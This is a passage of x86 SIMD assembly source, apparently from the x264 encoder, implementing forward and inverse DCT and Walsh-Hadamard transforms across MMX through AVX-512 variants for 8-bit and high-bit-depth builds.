; HIGH_BIT_DEPTH build: dctcoef is 32-bit, one row per xmm register.
; r0 = dctcoef d[4][4]; the +1 rounding bias is folded in before the
; second pass so the final >>1 rounds rather than truncates.
%macro DCT4x4_DC 0
cglobal dct4x4dc, 1,1,5
mova m0, [r0+ 0]
mova m1, [r0+16]
mova m2, [r0+32]
mova m3, [r0+48]
WALSH4_1D d, 0,1,2,3,4 ; first pass
TRANSPOSE4x4D 0,1,2,3,4
paddd m0, [pd_1] ; rounding bias for the final >>1
WALSH4_1D d, 0,1,2,3,4 ; second pass (transposed direction)
psrad m0, 1
psrad m1, 1
psrad m2, 1
psrad m3, 1
mova [r0+ 0], m0
mova [r0+16], m1
mova [r0+32], m2
mova [r0+48], m3
RET
%endmacro ; DCT4x4_DC
INIT_XMM sse2
DCT4x4_DC
INIT_XMM avx
DCT4x4_DC
%else
INIT_MMX mmx2
; 8-bit-depth variant: dctcoef is 16-bit, one row per mmx register.
; The 2-D WHT needs 17 bits of intermediate precision, so after the
; first pass the halving sum/diff is done via SUMSUB_17BIT (pavgw in
; the unsigned domain) instead of a plain butterfly + shift.
cglobal dct4x4dc, 1,1
movq m3, [r0+24]
movq m2, [r0+16]
movq m1, [r0+ 8]
movq m0, [r0+ 0]
movq m7, [pw_8000] ; convert to unsigned and back, so that pavgw works
WALSH4_1D w, 0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
SUMSUB_BADC w, 1, 0, 3, 2, 4
SWAP 0, 1
SWAP 2, 3
SUMSUB_17BIT 0,2,4,7
SUMSUB_17BIT 1,3,5,7
movq [r0+0], m0
movq [r0+8], m2
movq [r0+16], m3
movq [r0+24], m1
RET
%endif ; HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void idct4x4dc( int32_t d[4][4] )
;-----------------------------------------------------------------------------
%macro IDCT4x4DC 0
cglobal idct4x4dc, 1,1
mova m3, [r0+48]
mova m2, [r0+32]
mova m1, [r0+16]
mova m0, [r0+ 0]
WALSH4_1D d,0,1,2,3,4
TRANSPOSE4x4D 0,1,2,3,4
WALSH4_1D d,0,1,2,3,4
mova [r0+ 0], m0
mova [r0+16], m1
mova [r0+32], m2
mova [r0+48], m3
RET
%endmacro ; IDCT4x4DC
INIT_XMM sse2
IDCT4x4DC
INIT_XMM avx
IDCT4x4DC
%else
;-----------------------------------------------------------------------------
; void idct4x4dc( int16_t d[4][4] )
;-----------------------------------------------------------------------------
INIT_MMX mmx
cglobal idct4x4dc, 1,1
movq m3, [r0+24]
movq m2, [r0+16]
movq m1, [r0+ 8]
movq m0, [r0+ 0]
WALSH4_1D w,0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
WALSH4_1D w,0,1,2,3,4
movq [r0+ 0], m0
movq [r0+ 8], m1
movq [r0+16], m2
movq [r0+24], m3
RET
%endif ; HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void dct2x4dc( dctcoef dct[8], dctcoef dct4x4[8][16] )
;-----------------------------------------------------------------------------
%if WIN64
DECLARE_REG_TMP 6 ; Avoid some REX prefixes to reduce code size
%else
DECLARE_REG_TMP 2
%endif
%macro INSERT_COEFF 3 ; dst, src, imm
; Insert the dctcoef at memory operand %2 into lane %3 of register %1,
; then zero the coefficient in memory (t0 is expected to hold 0 -- the
; caller does `xor t0d, t0d` first).  Lane 0 is a plain movd; without
; SSE4 the higher high-bit-depth lanes are assembled with punpck
; sequences, one intermediate staying in m2 until the next call
; combines it.
%if %3
%if HIGH_BIT_DEPTH
%if cpuflag(sse4)
pinsrd %1, %2, %3
%elif %3 == 2
movd m2, %2
%elif %3 == 1
punpckldq %1, %2
%else
punpckldq m2, %2
punpcklqdq %1, m2
%endif
%else
%if %3 == 2
punpckldq %1, %2
%else
pinsrw %1, %2, %3
%endif
%endif
%else
movd %1, %2
%endif
; write back 0 so the DC is removed from the source 4x4 block
%if HIGH_BIT_DEPTH
mov %2, t0d
%else
mov %2, t0w
%endif
%endmacro
; void dct2x4dc( dctcoef dct[8], dctcoef dct4x4[8][16] )
; Gathers the DC coefficient of eight 4x4 blocks (zeroing each in
; place via INSERT_COEFF with t0 = 0), runs the 2x4 DC butterfly
; network and stores the 8 results at r0.
; %1 = element size suffix (w/d), %2 = SBUTTERFLY granularity (wd/dq).
%macro DCT2x4DC 2
cglobal dct2x4dc, 2,3
xor t0d, t0d ; t0 = 0, used by INSERT_COEFF to clear each source DC
INSERT_COEFF m0, [r1+0*16*SIZEOF_DCTCOEF], 0
INSERT_COEFF m0, [r1+1*16*SIZEOF_DCTCOEF], 2
add r1, 4*16*SIZEOF_DCTCOEF
INSERT_COEFF m0, [r1-2*16*SIZEOF_DCTCOEF], 1
INSERT_COEFF m0, [r1-1*16*SIZEOF_DCTCOEF], 3
INSERT_COEFF m1, [r1+0*16*SIZEOF_DCTCOEF], 0
INSERT_COEFF m1, [r1+1*16*SIZEOF_DCTCOEF], 2
INSERT_COEFF m1, [r1+2*16*SIZEOF_DCTCOEF], 1
INSERT_COEFF m1, [r1+3*16*SIZEOF_DCTCOEF], 3
SUMSUB_BA %1, 1, 0, 2
SBUTTERFLY %2, 1, 0, 2
SUMSUB_BA %1, 0, 1, 2
SBUTTERFLY %2, 0, 1, 2
SUMSUB_BA %1, 1, 0, 2
pshuf%1 m0, m0, q1032
mova [r0], m1
mova [r0+mmsize], m0
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
DCT2x4DC d, dq
INIT_XMM avx
DCT2x4DC d, dq
%else
INIT_MMX mmx2
DCT2x4DC w, wd
%endif
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void sub4x4_dct( dctcoef dct[4][4], pixel *pix1, pixel *pix2 )
;-----------------------------------------------------------------------------
INIT_MMX mmx
cglobal sub4x4_dct, 3,3
.skip_prologue:
LOAD_DIFF m0, m4, none, [r1+0*FENC_STRIDE], [r2+0*FDEC_STRIDE]
LOAD_DIFF m3, m4, none, [r1+6*FENC_STRIDE], [r2+6*FDEC_STRIDE]
LOAD_DIFF m1, m4, none, [r1+2*FENC_STRIDE], [r2+2*FDEC_STRIDE]
LOAD_DIFF m2, m4, none, [r1+4*FENC_STRIDE], [r2+4*FDEC_STRIDE]
DCT4_1D 0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
SUMSUB_BADC w, 3, 0, 2, 1
SUMSUB_BA w, 2, 3, 4
DCT_UNPACK m2, m4, m5
DCT_UNPACK m3, m6, m7
mova [r0+ 0], m2 ; s03 + s12
mova [r0+ 8], m4
mova [r0+32], m3 ; s03 - s12
mova [r0+40], m6
DCT_UNPACK m0, m2, m4
DCT_UNPACK m1, m3, m5
SUMSUB2_AB d, 0, 1, 4
SUMSUB2_AB d, 2, 3, 5
mova [r0+16], m0 ; d03*2 + d12
mova [r0+24], m2
mova [r0+48], m4 ; d03 - 2*d12
mova [r0+56], m5
RET
%else
%macro SUB_DCT4 0
cglobal sub4x4_dct, 3,3
.skip_prologue:
%if cpuflag(ssse3)
mova m5, [hsub_mul]
%endif
LOAD_DIFF8x4 0, 3, 1, 2, 4, 5, r1, r2
DCT4_1D 0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
DCT4_1D 0,1,2,3,4
movq [r0+ 0], m0
movq [r0+ 8], m1
movq [r0+16], m2
movq [r0+24], m3
RET
%endmacro
INIT_MMX mmx
SUB_DCT4
INIT_MMX ssse3
SUB_DCT4
%endif ; HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void add4x4_idct( pixel *p_dst, dctcoef dct[4][4] )
;-----------------------------------------------------------------------------
%macro STORE_DIFFx2 6 ; res1, res2, tmp, zero, addr1, addr2
; Finish one idct row pair (high bit depth): scale the dword residuals
; down (>>6), pack to words, add the two pixel rows at %5/%6, clip to
; [0, pixel_max] (CLIPW with %4 = zero register) and store back.
; Clobbers %1 and %3.
psrad %1, 6
psrad %2, 6
packssdw %1, %2
movq %3, %5
movhps %3, %6
paddsw %1, %3
CLIPW %1, %4, [pw_pixel_max]
movq %5, %1
movhps %6, %1
%endmacro
%macro ADD4x4_IDCT 0
cglobal add4x4_idct, 2,2,6
add r0, 2*FDEC_STRIDEB
.skip_prologue:
mova m1, [r1+16]
mova m3, [r1+48]
mova m2, [r1+32]
mova m0, [r1+ 0]
IDCT4_1D d,0,1,2,3,4,5
TRANSPOSE4x4D 0,1,2,3,4
paddd m0, [pd_32]
IDCT4_1D d,0,1,2,3,4,5
pxor m5, m5
STORE_DIFFx2 m0, m1, m4, m5, [r0-2*FDEC_STRIDEB], [r0-1*FDEC_STRIDEB]
STORE_DIFFx2 m2, m3, m4, m5, [r0+0*FDEC_STRIDEB], [r0+1*FDEC_STRIDEB]
RET
%endmacro
INIT_XMM sse2
ADD4x4_IDCT
INIT_XMM avx
ADD4x4_IDCT
%else ; !HIGH_BIT_DEPTH
INIT_MMX mmx
cglobal add4x4_idct, 2,2
pxor m7, m7
.skip_prologue:
movq m1, [r1+ 8]
movq m3, [r1+24]
movq m2, [r1+16]
movq m0, [r1+ 0]
IDCT4_1D w,0,1,2,3,4,5
TRANSPOSE4x4W 0,1,2,3,4
paddw m0, [pw_32]
IDCT4_1D w,0,1,2,3,4,5
STORE_DIFF m0, m4, m7, [r0+0*FDEC_STRIDE]
STORE_DIFF m1, m4, m7, [r0+1*FDEC_STRIDE]
STORE_DIFF m2, m4, m7, [r0+2*FDEC_STRIDE]
STORE_DIFF m3, m4, m7, [r0+3*FDEC_STRIDE]
RET
%macro ADD4x4 0
cglobal add4x4_idct, 2,2,6
mova m1, [r1+0x00] ; row1/row0
mova m3, [r1+0x10] ; row3/row2
psraw m0, m1, 1 ; row1>>1/...
psraw m2, m3, 1 ; row3>>1/...
movsd m0, m1 ; row1>>1/row0
movsd m2, m3 ; row3>>1/row2
psubw m0, m3 ; row1>>1-row3/row0-2
paddw m2, m1 ; row3>>1+row1/row0+2
SBUTTERFLY2 wd, 0, 2, 1
SUMSUB_BA w, 2, 0, 1
pshuflw m1, m2, q2301
pshufhw m2, m2, q2301
punpckldq m1, m0
punpckhdq m2, m0
SWAP 0, 1
mova m1, [pw_32_0]
paddw m1, m0 ; row1/row0 corrected
psraw m0, 1 ; row1>>1/...
psraw m3, m2, 1 ; row3>>1/...
movsd m0, m1 ; row1>>1/row0
movsd m3, m2 ; row3>>1/row2
psubw m0, m2 ; row1>>1-row3/row0-2
paddw m3, m1 ; row3>>1+row1/row0+2
SBUTTERFLY2 qdq, 0, 3, 1
SUMSUB_BA w, 3, 0, 1
movd m4, [r0+FDEC_STRIDE*0]
movd m1, [r0+FDEC_STRIDE*1]
movd m2, [r0+FDEC_STRIDE*2]
movd m5, [r0+FDEC_STRIDE*3]
punpckldq m1, m4 ; row0/row1
pxor m4, m4
punpckldq m2, m5 ; row3/row2
punpcklbw m1, m4
psraw m3, 6
punpcklbw m2, m4
psraw m0, 6
paddsw m3, m1
paddsw m0, m2
packuswb m0, m3 ; row0/row1/row3/row2
pextrd [r0+FDEC_STRIDE*0], m0, 3
pextrd [r0+FDEC_STRIDE*1], m0, 2
movd [r0+FDEC_STRIDE*2], m0
pextrd [r0+FDEC_STRIDE*3], m0, 1
RET
%endmacro ; ADD4x4
INIT_XMM sse4
ADD4x4
INIT_XMM avx
ADD4x4
%macro STOREx2_AVX2 9
movq xm%3, [r0+%5*FDEC_STRIDE]
vinserti128 m%3, m%3, [r0+%6*FDEC_STRIDE], 1
movq xm%4, [r0+%7*FDEC_STRIDE]
vinserti128 m%4, m%4, [r0+%8*FDEC_STRIDE], 1
punpcklbw m%3, m%9
punpcklbw m%4, m%9
psraw m%1, 6
psraw m%2, 6
paddsw m%1, m%3
paddsw m%2, m%4
packuswb m%1, m%2
vextracti128 xm%2, m%1, 1
movq [r0+%5*FDEC_STRIDE], xm%1
movq [r0+%6*FDEC_STRIDE], xm%2
movhps [r0+%7*FDEC_STRIDE], xm%1
movhps [r0+%8*FDEC_STRIDE], xm%2
%endmacro
INIT_YMM avx2
cglobal add8x8_idct, 2,3,8
add r0, 4*FDEC_STRIDE
pxor m7, m7
TAIL_CALL .skip_prologue, 0
global current_function %+ .skip_prologue
.skip_prologue:
; TRANSPOSE4x4Q
mova xm0, [r1+ 0]
mova xm1, [r1+32]
mova xm2, [r1+16]
mova xm3, [r1+48]
vinserti128 m0, m0, [r1+ 64], 1
vinserti128 m1, m1, [r1+ 96], 1
vinserti128 m2, m2, [r1+ 80], 1
vinserti128 m3, m3, [r1+112], 1
SBUTTERFLY qdq, 0, 1, 4
SBUTTERFLY qdq, 2, 3, 4
IDCT4_1D w,0,1,2,3,4,5
TRANSPOSE2x4x4W 0,1,2,3,4
paddw m0, [pw_32]
IDCT4_1D w,0,1,2,3,4,5
STOREx2_AVX2 0, 1, 4, 5, -4, 0, -3, 1, 7
STOREx2_AVX2 2, 3, 4, 5, -2, 2, -1, 3, 7
ret
; 2xdst, 2xtmp, 4xsrcrow, 1xzero
%macro LOAD_DIFF8x2_AVX2 9
movq xm%1, [r1+%5*FENC_STRIDE]
movq xm%2, [r1+%6*FENC_STRIDE]
vinserti128 m%1, m%1, [r1+%7*FENC_STRIDE], 1
vinserti128 m%2, m%2, [r1+%8*FENC_STRIDE], 1
punpcklbw m%1, m%9
punpcklbw m%2, m%9
movq xm%3, [r2+(%5-4)*FDEC_STRIDE]
movq xm%4, [r2+(%6-4)*FDEC_STRIDE]
vinserti128 m%3, m%3, [r2+(%7-4)*FDEC_STRIDE], 1
vinserti128 m%4, m%4, [r2+(%8-4)*FDEC_STRIDE], 1
punpcklbw m%3, m%9
punpcklbw m%4, m%9
psubw m%1, m%3
psubw m%2, m%4
%endmacro
; 4x src, 1x tmp
%macro STORE8_DCT_AVX2 5
SBUTTERFLY qdq, %1, %2, %5
SBUTTERFLY qdq, %3, %4, %5
mova [r0+ 0], xm%1
mova [r0+ 16], xm%3
mova [r0+ 32], xm%2
mova [r0+ 48], xm%4
vextracti128 [r0+ 64], m%1, 1
vextracti128 [r0+ 80], m%3, 1
vextracti128 [r0+ 96], m%2, 1
vextracti128 [r0+112], m%4, 1
%endmacro
%macro STORE16_DCT_AVX2 5
SBUTTERFLY qdq, %1, %2, %5
SBUTTERFLY qdq, %3, %4, %5
mova [r0+ 0-128], xm%1
mova [r0+16-128], xm%3
mova [r0+32-128], xm%2
mova [r0+48-128], xm%4
vextracti128 [r0+ 0], m%1, 1
vextracti128 [r0+16], m%3, 1
vextracti128 [r0+32], m%2, 1
vextracti128 [r0+48], m%4, 1
%endmacro
INIT_YMM avx2
cglobal sub8x8_dct, 3,3,7
pxor m6, m6
add r2, 4*FDEC_STRIDE
LOAD_DIFF8x2_AVX2 0, 1, 4, 5, 0, 1, 4, 5, 6
LOAD_DIFF8x2_AVX2 2, 3, 4, 5, 2, 3, 6, 7, 6
DCT4_1D 0, 1, 2, 3, 4
TRANSPOSE2x4x4W 0, 1, 2, 3, 4
DCT4_1D 0, 1, 2, 3, 4
STORE8_DCT_AVX2 0, 1, 2, 3, 4
RET
INIT_YMM avx2
cglobal sub16x16_dct, 3,3,6
add r0, 128
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
add r0, 64
add r1, 4*FENC_STRIDE
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
add r0, 256-64
add r1, 4*FENC_STRIDE
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
add r0, 64
add r1, 4*FENC_STRIDE
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
RET
.sub16x4_dct:
LOAD_DIFF16x2_AVX2 0, 1, 4, 5, 0, 1
LOAD_DIFF16x2_AVX2 2, 3, 4, 5, 2, 3
DCT4_1D 0, 1, 2, 3, 4
TRANSPOSE2x4x4W 0, 1, 2, 3, 4
DCT4_1D 0, 1, 2, 3, 4
STORE16_DCT_AVX2 0, 1, 2, 3, 4
ret
%macro DCT4x4_AVX512 0
psubw m0, m2 ; 0 1
psubw m1, m3 ; 3 2
SUMSUB_BA w, 1, 0, 2
SBUTTERFLY wd, 1, 0, 2
paddw m2, m1, m0
psubw m3, m1, m0
paddw m2 {k1}, m1 ; 0+1+2+3 0<<1+1-2-3<<1
psubw m3 {k1}, m0 ; 0-1-2+3 0-1<<1+2<<1-3
shufps m1, m2, m3, q2323 ; a3 b3 a2 b2 c3 d3 c2 d2
punpcklqdq m2, m3 ; a0 b0 a1 b1 c0 d0 c1 d1
SUMSUB_BA w, 1, 2, 3
shufps m3, m1, m2, q3131 ; a1+a2 b1+b2 c1+c2 d1+d2 a1-a2 b1-b2 b1-b2 d1-d2
shufps m1, m2, q2020 ; a0+a3 b0+b3 c0+c3 d0+d3 a0-a3 b0-b3 c0-c3 d0-d3
paddw m2, m1, m3
psubw m0, m1, m3
paddw m2 {k2}, m1 ; 0'+1'+2'+3' 0'<<1+1'-2'-3'<<1
psubw m0 {k2}, m3 ; 0'-1'-2'+3' 0'-1'<<1+2'<<1-3'
%endmacro
INIT_XMM avx512
cglobal sub4x4_dct
mov eax, 0xf0aa
kmovw k1, eax
PROLOGUE 3,3
movd m0, [r1+0*FENC_STRIDE]
movd m2, [r2+0*FDEC_STRIDE]
vpbroadcastd m0 {k1}, [r1+1*FENC_STRIDE]
vpbroadcastd m2 {k1}, [r2+1*FDEC_STRIDE]
movd m1, [r1+3*FENC_STRIDE]
movd m3, [r2+3*FDEC_STRIDE]
vpbroadcastd m1 {k1}, [r1+2*FENC_STRIDE]
vpbroadcastd m3 {k1}, [r2+2*FDEC_STRIDE]
kshiftrw k2, k1, 8
pxor m4, m4
punpcklbw m0, m4
punpcklbw m2, m4
punpcklbw m1, m4
punpcklbw m3, m4
DCT4x4_AVX512
mova [r0], m2
mova [r0+16], m0
RET
INIT_ZMM avx512
cglobal dct4x4x4_internal
punpcklbw m0, m1, m4
punpcklbw m2, m3, m4
punpckhbw m1, m4
punpckhbw m3, m4
DCT4x4_AVX512
mova m1, m2
vshufi32x4 m2 {k2}, m0, m0, q2200 ; m0
vshufi32x4 m0 {k3}, m1, m1, q3311 ; m1
ret
%macro DCT8x8_LOAD_FENC_AVX512 4 ; dst, perm, row1, row2
movu %1, [r1+%3*FENC_STRIDE]
vpermt2d %1, %2, [r1+%4*FENC_STRIDE]
%endmacro
%macro DCT8x8_LOAD_FDEC_AVX512 5 ; dst, perm, tmp, row1, row2
movu %1, [r2+(%4 )*FDEC_STRIDE]
vmovddup %1 {k1}, [r2+(%4+2)*FDEC_STRIDE]
movu %3, [r2+(%5 )*FDEC_STRIDE]
vmovddup %3 {k1}, [r2+(%5+2)*FDEC_STRIDE]
vpermt2d %1, %2, %3
%endmacro
cglobal sub8x8_dct, 3,3
mova m0, [dct_avx512]
DCT8x8_LOAD_FENC_AVX512 m1, m0, 0, 4 ; 0 2 1 3
mov r1d, 0xaaaaaaaa
kmovd k1, r1d
psrld m0, 5
DCT8x8_LOAD_FDEC_AVX512 m3, m0, m2, 0, 4
mov r1d, 0xf0f0f0f0
kmovd k2, r1d
pxor xm4, xm4
knotw k3, k2
call dct4x4x4_internal_avx512
mova [r0], m0
mova [r0+64], m1
RET
%macro SUB4x16_DCT_AVX512 2 ; dst, src
vpermd m1, m5, [r1+1*%2*64]
mova m3, [r2+2*%2*64]
vpermt2d m3, m6, [r2+2*%2*64+64]
call dct4x4x4_internal_avx512
mova [r0+%1*64 ], m0
mova [r0+%1*64+128], m1
%endmacro
cglobal sub16x16_dct
psrld m5, [dct_avx512], 10
mov eax, 0xaaaaaaaa
kmovd k1, eax
mov eax, 0xf0f0f0f0
kmovd k2, eax
PROLOGUE 3,3
pxor xm4, xm4
knotw k3, k2
psrld m6, m5, 4
SUB4x16_DCT_AVX512 0, 0
SUB4x16_DCT_AVX512 1, 1
SUB4x16_DCT_AVX512 4, 2
SUB4x16_DCT_AVX512 5, 3
RET
cglobal sub8x8_dct_dc, 3,3
mova m3, [dct_avx512]
DCT8x8_LOAD_FENC_AVX512 m0, m3, 0, 4 ; 0 2 1 3
mov r1d, 0xaa
kmovb k1, r1d
psrld m3, 5
DCT8x8_LOAD_FDEC_AVX512 m1, m3, m2, 0, 4
pxor xm3, xm3
psadbw m0, m3
psadbw m1, m3
psubw m0, m1
vpmovqw xmm0, m0
vprold xmm1, xmm0, 16
paddw xmm0, xmm1 ; 0 0 2 2 1 1 3 3
punpckhqdq xmm2, xmm0, xmm0
psubw xmm1, xmm0, xmm2 ; 0-1 0-1 2-3 2-3
paddw xmm0, xmm2 ; 0+1 0+1 2+3 2+3
punpckldq xmm0, xmm1 ; 0+1 0+1 0-1 0-1 2+3 2+3 2-3 2-3
punpcklqdq xmm1, xmm0, xmm0
psubw xmm0 {k1}, xm3, xmm0
paddw xmm0, xmm1 ; 0+1+2+3 0+1-2-3 0-1+2-3 0-1-2+3
movhps [r0], xmm0
RET
cglobal sub8x16_dct_dc, 3,3
mova m5, [dct_avx512]
DCT8x8_LOAD_FENC_AVX512 m0, m5, 0, 8 ; 0 4 1 5
DCT8x8_LOAD_FENC_AVX512 m1, m5, 4, 12 ; 2 6 3 7
mov r1d, 0xaa
kmovb k1, r1d
psrld m5, 5
DCT8x8_LOAD_FDEC_AVX512 m2, m5, m4, 0, 8
DCT8x8_LOAD_FDEC_AVX512 m3, m5, m4, 4, 12
pxor xm4, xm4
psadbw m0, m4
psadbw m1, m4
psadbw m2, m4
psadbw m3, m4
psubw m0, m2
psubw m1, m3
SBUTTERFLY qdq, 0, 1, 2
paddw m0, m1
vpmovqw xmm0, m0 ; 0 2 4 6 1 3 5 7
psrlq xmm2, xmm0, 32
psubw xmm1, xmm0, xmm2 ; 0-4 2-6 1-5 3-7
paddw xmm0, xmm2 ; 0+4 2+6 1+5 3+7
punpckhdq xmm2, xmm0, xmm1
punpckldq xmm0, xmm1
psubw xmm1, xmm0, xmm2 ; 0-1+4-5 2-3+6-7 0-1-4+5 2-3-6+7
paddw xmm0, xmm2 ; 0+1+4+5 2+3+6+7 0+1-4-5 2+3-6-7
punpcklwd xmm0, xmm1
psrlq xmm2, xmm0, 32
psubw xmm1, xmm0, xmm2 ; 0+1-2-3+4+5-6-7 0-1-2+3+4-5-6+7 0+1-2-3-4-5+6+7 0-1-2+3-4+5+6-7
paddw xmm0, xmm2 ; 0+1+2+3+4+5+6+7 0-1+2-3+4-5+6-7 0+1+2+3-4-5-6-7 0-1+2-3-4+5-6+7
shufps xmm0, xmm1, q0220
mova [r0], xmm0
RET
%macro SARSUMSUB 3 ; a, b, tmp
; Butterfly with a merged >>1: the lanes selected by mask k1 are
; arithmetically shifted right by one before the sum/difference
; (AVX-512 merge-masking), producing the mixed x / x>>1 terms of the
; H.264 4x4 inverse transform in a single pass.  Clobbers %3.
mova m%3, m%1
vpsraw m%1 {k1}, 1
psubw m%1, m%2 ; 0-2 1>>1-3
vpsraw m%2 {k1}, 1
paddw m%2, m%3 ; 0+2 1+3>>1
%endmacro
cglobal add8x8_idct, 2,2
mova m1, [r1]
mova m2, [r1+64]
mova m3, [dct_avx512]
vbroadcasti32x4 m4, [pw_32]
mov r1d, 0xf0f0f0f0
kxnorb k2, k2, k2
kmovd k1, r1d
kmovb k3, k2
vshufi32x4 m0, m1, m2, q2020 ; 0 1 4 5 8 9 c d
vshufi32x4 m1, m2, q3131 ; 2 3 6 7 a b e f
psrlq m5, m3, 56 ; {0, 3, 1, 2, 4, 7, 5, 6} * FDEC_STRIDE
vpgatherqq m6 {k2}, [r0+m5]
SARSUMSUB 0, 1, 2
SBUTTERFLY wd, 1, 0, 2
psrlq m7, m3, 28
SUMSUB_BA w, 0, 1, 2 ; 0+1+2+3>>1 0+1>>1-2-3
vprold m1, 16 ; 0-1>>1-2+3 0-1+2-3>>1
SBUTTERFLY dq, 0, 1, 2
psrlq m3, 24
SARSUMSUB 0, 1, 2
vpermi2q m3, m1, m0
vpermt2q m1, m7, m0
paddw m3, m4 ; += 32
SUMSUB_BA w, 1, 3, 0
psraw m1, 6 ; 0'+1'+2'+3'>>1 0'+1'>>1-2'-3'
psraw m3, 6 ; 0'-1'+2'-3'>>1 0'-1'>>1-2'+3'
pxor xm0, xm0
SBUTTERFLY bw, 6, 0, 2
paddsw m1, m6
paddsw m3, m0
packuswb m1, m3
vpscatterqq [r0+m5] {k3}, m1
RET
%endif ; HIGH_BIT_DEPTH
INIT_MMX
;-----------------------------------------------------------------------------
; void sub8x8_dct( int16_t dct[4][4][4], uint8_t *pix1, uint8_t *pix2 )
;-----------------------------------------------------------------------------
; Tile four calls of a sub-block dct into one NxN transform.
; %1 = exported name, %2 = sub-block function (entered at its
; .skip_prologue label so the shared setup below runs only once),
; %3 = byte size of each call's dct output (advance of r0),
; %4/%5/%6 = geometry constants used to step r1 (fenc) and r2 (fdec)
; between the four sub-blocks, %7 = xmm register count for cglobal.
; The fourth call is a tail call, so the callee's return is ours.
%macro SUB_NxN_DCT 7
cglobal %1, 3,3,%7
%if HIGH_BIT_DEPTH == 0
%if mmsize == 8
pxor m7, m7
%else
add r2, 4*FDEC_STRIDE
mova m7, [hsub_mul]
%endif
%endif ; !HIGH_BIT_DEPTH
.skip_prologue:
call %2.skip_prologue
add r0, %3
add r1, %4-%5-%6*FENC_STRIDE
add r2, %4-%5-%6*FDEC_STRIDE
call %2.skip_prologue
add r0, %3
add r1, (%4-%6)*FENC_STRIDE-%5-%4
add r2, (%4-%6)*FDEC_STRIDE-%5-%4
call %2.skip_prologue
add r0, %3
add r1, %4-%5-%6*FENC_STRIDE
add r2, %4-%5-%6*FDEC_STRIDE
TAIL_CALL %2.skip_prologue, 1
%endmacro
;-----------------------------------------------------------------------------
; void add8x8_idct( uint8_t *pix, int16_t dct[4][4][4] )
;-----------------------------------------------------------------------------
; Tile four calls of a sub-block idct into one NxN inverse transform,
; mirroring SUB_NxN_DCT: %1 = exported name, %2 = sub-block function
; (entered at .skip_prologue), %3 = byte size of each call's dct input
; (advance of r1), %4/%5/%6 = geometry constants stepping r0 (fdec)
; between sub-blocks, optional %7 = xmm count (high-bit-depth build).
; The fourth call is a tail call.
%macro ADD_NxN_IDCT 6-7
%if HIGH_BIT_DEPTH
cglobal %1, 2,2,%7
%if %3==256
add r1, 128
%endif
%else
cglobal %1, 2,2,11
pxor m7, m7
%endif
%if mmsize>=16 && %3!=256
add r0, 4*FDEC_STRIDE
%endif
.skip_prologue:
call %2.skip_prologue
add r0, %4-%5-%6*FDEC_STRIDE
add r1, %3
call %2.skip_prologue
add r0, (%4-%6)*FDEC_STRIDE-%5-%4
add r1, %3
call %2.skip_prologue
add r0, %4-%5-%6*FDEC_STRIDE
add r1, %3
TAIL_CALL %2.skip_prologue, 1
%endmacro
%if HIGH_BIT_DEPTH
INIT_MMX
SUB_NxN_DCT sub8x8_dct_mmx, sub4x4_dct_mmx, 64, 8, 0, 0, 0
SUB_NxN_DCT sub16x16_dct_mmx, sub8x8_dct_mmx, 64, 16, 8, 8, 0
INIT_XMM
ADD_NxN_IDCT add8x8_idct_sse2, add4x4_idct_sse2, 64, 8, 0, 0, 6
ADD_NxN_IDCT add16x16_idct_sse2, add8x8_idct_sse2, 64, 16, 8, 8, 6
ADD_NxN_IDCT add8x8_idct_avx, add4x4_idct_avx, 64, 8, 0, 0, 6
ADD_NxN_IDCT add16x16_idct_avx, add8x8_idct_avx, 64, 16, 8, 8, 6
cextern add8x8_idct8_sse2.skip_prologue
cextern add8x8_idct8_avx.skip_prologue
ADD_NxN_IDCT add16x16_idct8_sse2, add8x8_idct8_sse2, 256, 16, 0, 0, 16
ADD_NxN_IDCT add16x16_idct8_avx, add8x8_idct8_avx, 256, 16, 0, 0, 16
cextern sub8x8_dct8_sse2.skip_prologue
cextern sub8x8_dct8_sse4.skip_prologue
cextern sub8x8_dct8_avx.skip_prologue
SUB_NxN_DCT sub16x16_dct8_sse2, sub8x8_dct8_sse2, 256, 16, 0, 0, 14
SUB_NxN_DCT sub16x16_dct8_sse4, sub8x8_dct8_sse4, 256, 16, 0, 0, 14
SUB_NxN_DCT sub16x16_dct8_avx, sub8x8_dct8_avx, 256, 16, 0, 0, 14
%else ; !HIGH_BIT_DEPTH
%if ARCH_X86_64 == 0
INIT_MMX
SUB_NxN_DCT sub8x8_dct_mmx, sub4x4_dct_mmx, 32, 4, 0, 0, 0
ADD_NxN_IDCT add8x8_idct_mmx, add4x4_idct_mmx, 32, 4, 0, 0
SUB_NxN_DCT sub16x16_dct_mmx, sub8x8_dct_mmx, 32, 8, 4, 4, 0
ADD_NxN_IDCT add16x16_idct_mmx, add8x8_idct_mmx, 32, 8, 4, 4
cextern sub8x8_dct8_mmx.skip_prologue
cextern add8x8_idct8_mmx.skip_prologue
SUB_NxN_DCT sub16x16_dct8_mmx, sub8x8_dct8_mmx, 128, 8, 0, 0, 0
ADD_NxN_IDCT add16x16_idct8_mmx, add8x8_idct8_mmx, 128, 8, 0, 0
%endif
INIT_XMM
cextern sub8x8_dct_sse2.skip_prologue
cextern sub8x8_dct_ssse3.skip_prologue
cextern sub8x8_dct_avx.skip_prologue
cextern sub8x8_dct_xop.skip_prologue
SUB_NxN_DCT sub16x16_dct_sse2, sub8x8_dct_sse2, 128, 8, 0, 0, 10
SUB_NxN_DCT sub16x16_dct_ssse3, sub8x8_dct_ssse3, 128, 8, 0, 0, 10
SUB_NxN_DCT sub16x16_dct_avx, sub8x8_dct_avx, 128, 8, 0, 0, 10
SUB_NxN_DCT sub16x16_dct_xop, sub8x8_dct_xop, 128, 8, 0, 0, 10
cextern add8x8_idct_sse2.skip_prologue
cextern add8x8_idct_avx.skip_prologue
ADD_NxN_IDCT add16x16_idct_sse2, add8x8_idct_sse2, 128, 8, 0, 0
